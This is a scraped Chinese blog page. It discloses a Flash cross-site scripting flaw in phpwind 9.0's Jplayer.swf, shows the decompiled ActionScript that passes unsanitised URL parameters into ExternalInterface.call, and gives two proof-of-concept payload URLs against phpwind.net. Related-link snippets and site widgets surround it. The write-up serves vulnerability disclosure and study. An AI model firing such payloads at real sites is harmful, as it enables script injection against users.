php util.js,phpwind 9.0 /res/js/dev/util_libs/jPlayer/Jplayer.swf 跨站脚本漏洞

最新推荐文章于 2023-04-06 11:41:23 发布
最新推荐文章于 2023-04-06 11:41:23 发布
阅读量245 收藏
点赞数
文章标签: php util.js

1、漏洞文件为:http://www.phpwind.net/res/js/dev/util_libs/jPlayer/Jplayer.swf
2、反编译后看代码:

this.jQuery = (((loaderInfo.parameters.jQuery + "('#") + loaderInfo.parameters.id) + "').jPlayer");

……

private function init(_arg1:TimerEvent):void{

this.myInitTimer.stop();

if (ExternalInterface.available){

……

ExternalInterface.call(this.jQuery, "jPlayerFlashEvent", JplayerEvent.JPLAYER_READY, this.extractStatusData(this.commonStatus));

};

}


3、我们看到在上面的代码中jQuery变量是由loaderInfo.parameters.jQuery和loaderInfo.parameters.id两个外部参数拼接而成的,并且没有进行任何的处理直接带入到ExternalInterface.call中。
4、可以构造两个POC,为下面,所以是两处xss:http://www.phpwind.net/res/js/dev/util_libs/jPlayer/Jplayer.swf?jQuery=alert(1))}catch(e){}//http://www.phpwind.net/res/js/dev/util_libs/jPlayer/Jplayer.swf?id='))}catch(e){alert(1)}//

loading-bars.svg

奇异果小姐
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JQuery跨站脚本漏洞
谢公子的博客
05-04 2万+
原理: jQuery中过滤用户输入数据所使用的正则表达式存在缺陷,可能导致 location.hash 跨站漏洞 影响版本: jquery-1.7.1~1.8.3 jquery-1.6.min.jsjquery-1.6.1.min.jsjquery-1.6.2.min.js jquery-1.5所有版本 jquery-1.4所有版本 ...
SCANV团队:警惕DiscuzX mp3player.swf跨站脚本漏洞
u013115619的专栏
12-25 857
近日SCANV团队接到某站长反馈:“最新安装DzX系统被扫描报告mp3player.swf存在跨站脚本漏洞”。经分析测试发现该漏洞确实存在并影响到最新Discuz X3.1及以下版本,我们现已报告给官方。由于该漏洞细节早被曝光,可临时删除/static/image/common/mp3player.swf
WordPress Smart Flv插件‘jwplayer.swf’多个跨站脚本漏洞
weixin_30925411的博客
02-27 255
漏洞名称: WordPress Smart Flv插件‘jwplayer.swf’多个跨站脚本漏洞 CNNVD编号: CNNVD-201302-573 发布时间: 2013-02-27 更新时间: 2013-02-27 危害等级: 漏洞类型: 跨站脚本 威胁类型: 远程 C...
jPlayer插件使用踩过的坑
qq_44441669的博客
04-28 923
业务需要,对于好几年前的老项目进行二次开发。项目的主要技术使用jquery+require.js。 最近需要做一个可以在系统中播放录音的需求,使用了兼容ie8的jPlayer插件。 这个插件已经有很长的历史了,最新一次的版本是2015年的。。。。。 没办法还得硬着头皮上。。。 首先我们需要知道,现在大部分使用的谷歌还有火狐,ie10以上的,在页面中加载音视频的时候,都使用的html进行加载的,但是...
网安之web攻防第三十六天
B_l_a_nk的博客
04-06 283
1、XSS跨站-原理&攻击&分类等 2、XSS跨站-MXSS&UXSS&FlashXss&PDFXSS等
Swfupload.swf 跨站脚本——漏洞复现
W小哥
12-18 4273
一、swfupload.swf简介 SWFUpload 是一款优秀的 Flash 上传控件,它可以非常好的增强 Web 端程序的用户上传体验。SWFUpload 自由灵活的 JavaScript 接口允许开发者自定义包括 HTML/CSS 在内的几乎所有 UI 样式,被广泛运用在大量站点的上传模块中,如 Youtube 和 WordPress 。 此漏洞可能导致严重的 XSS 安全隐患,但是官方一直没有修复。 二、漏洞复现 payload如下 http://XXX/images/swfupload/swfu
util.rar_Linux/Unix编程_Unix_Linux_
08-11
它们都是基于POSIX(Portable Operating System Interface)标准的操作系统,这意味着开发者可以使用跨平台的API,如C语言的标准库函数,来进行系统调用和进程交互。Unix提供了一系列的系统调用,如open、read、...
dbus-sysdeps-util.rar_Linux/Unix编程_Unix_Linux_
08-11
标题中的"dbus-sysdeps-util.rar"是一个压缩文件,通常包含源代码或工具,与Linux/Unix系统编程有关。DBus是Linux和Unix-like系统中的一种消息总线服务,用于进程间通信(IPC)。"dbus-sysdeps-util"可能是指DBus库...
apr-util-1.2.2.tar.gz_Linux/Unix编程_Unix_Linux_
08-12
2. 配置环境:`cd apr-util-1.2.2`,然后`./configure --prefix=/usr/local/apr-util` 3. 编译源码:`make` 4. 安装到系统:`sudo make install` 5. 更新环境变量:如需全局使用,可能需要更新`LD_LIBRARY_PATH`和`...
js-FunctionCollection.rar_JavaScript/JQuery_Java_
08-12
JavaScript 和 jQuery 是两种广泛应用于网页开发的脚本语言,它们在构建交互式用户界面和处理网页数据方面扮演着重要角色。而 Java 则是一种多用途的面向对象编程语言,广泛用于服务器端开发、移动应用以及大数据...
date.rar_JavaScript/JQuery_Java_
08-11
综合来看,这个压缩包可能包含了一个使用jQuery处理日期的JavaScript脚本(date.js),它可能是一个简单的日期选择器插件,或者是对JavaScript原生日期功能的扩展。开发者可能也提供了与Java后端交互的例子,展示了...
播放器JPlayer的使用及遇到的问题
杨春建的博客
08-29 2230
原文地址:http://blog.csdn.net/z69183787/article/details/8178656?_t_t_t=0.5149982699228508 jPlayer是一个用于控制和播放mp3文件的jQuery插件。它在后台使用Flash来播放mp3文件,前台播放器外观完全可以使用XHML/CSS自定义。支持: 有一点比较好的是,在支持HTML5的浏览器上会使用
Flash XSS 漏洞详解 根治的好办法
weixin_34256074的博客
11-03 364
本文的目的是深层次的分析Flash的ExternalInterface的XSS漏洞,并提出比较有效的解决方案。   首先,我们看看什么情况下,会出现XSS。   第一种情况:        把flashvars传入的参数(或者其他能被别人控制的方式)当ExternalInterface.call的第一个参数   package { import flas...
【JQ】-jPlayer视频、音乐播放器使用详解!
axer0811的专栏
05-07 8579
下载官网:http://www.jplayer.org/ 当前版本:2.3.0 功能:视频播放(可全屏)、音乐播放 全部原教程,说明并不详细,要结合查看其网页源代码来学习:http://www.jplayer.org/latest/demos/ 备注:文件夹里blue.monday和pink.flag和circle.skin三个文件夹里是三种播放器皮肤(及PSD文件),任选一种。样式文件和
项目部年度员工培训计划.docx
07-13
项目部年度员工培训计划.docx
c的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txt
最新发布
07-13
cc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.txtc的项目案例.tx
营销策划 -猫人内衣品牌升级诊断方案.pptx
07-13
营销策划 -猫人内衣品牌升级诊断方案.pptx
项目施工日志.docx
07-13
项目施工日志.docx
const util = require('../../utils/util.js')是什么意思
06-08
这段代码是在 Node.js 环境中引入了一个叫做 `util` 的模块,该模块是 Node...`require('../../utils/util.js')` 表示该模块位于当前文件所在目录的 `utils` 子目录下,并且该子目录又在当前文件所在目录的父级目录下。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值